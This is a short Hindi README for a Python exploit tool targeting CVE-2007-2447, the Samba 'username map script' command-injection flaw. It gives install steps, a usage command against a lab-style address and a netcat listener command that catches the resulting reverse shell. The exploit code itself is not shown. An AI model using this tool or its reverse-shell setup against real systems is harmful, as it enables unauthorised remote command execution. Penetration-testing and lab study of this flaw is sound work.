
CVE-2007-2447 के लिए पायथन शोषण जो Samba के username map script भेद्यता को लक्षित करता है, शेल मेटाकैरेक्टर्स के माध्यम से रिमोट कमांड निष्पादन और रिवर्स शेल पेलोड वितरण को सक्षम करता है।
"Samba 3.0.0 से 3.0.25rc3 तक smbd में MS-RPC कार्यक्षमता, दूरस्थ आक्रमणकारियों को शेल मेटाकैरेक्टर के जरिए मनमाने कमांड निष्पादित करने की अनुमति देती है, जिसमें (1) SamrChangePassword फंक्शन शामिल है, जब "username map script" smb.conf विकल्प सक्षम होता है, और दूरस्थ प्रमाणित उपयोगकर्ताओं को अन्य MS-RPC फंक्शन में शेल मेटाकैरेक्टर के जरिए कमांड निष्पादित करने की अनुमति देती है, जिसमें (2) रिमोट प्रिंटर और (3) फ़ाइल शेयर प्रबंधन शामिल है।"
[*] इस एक्सप्लॉइट के लिए Python 3.7 या उच्चतर आवश्यक है
python3 -m pip install pysmb
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
--rhost -- रिमोट होस्ट--lhost -- स्थानीय होस्ट--lport -- स्थानीय पोर्ट--rport -- रिमोट पोर्ट [*] वैकल्पिक। डिफ़ॉल्ट=445अपना लिसनर शुरू करना न भूलें:
nc -lvnp 4444
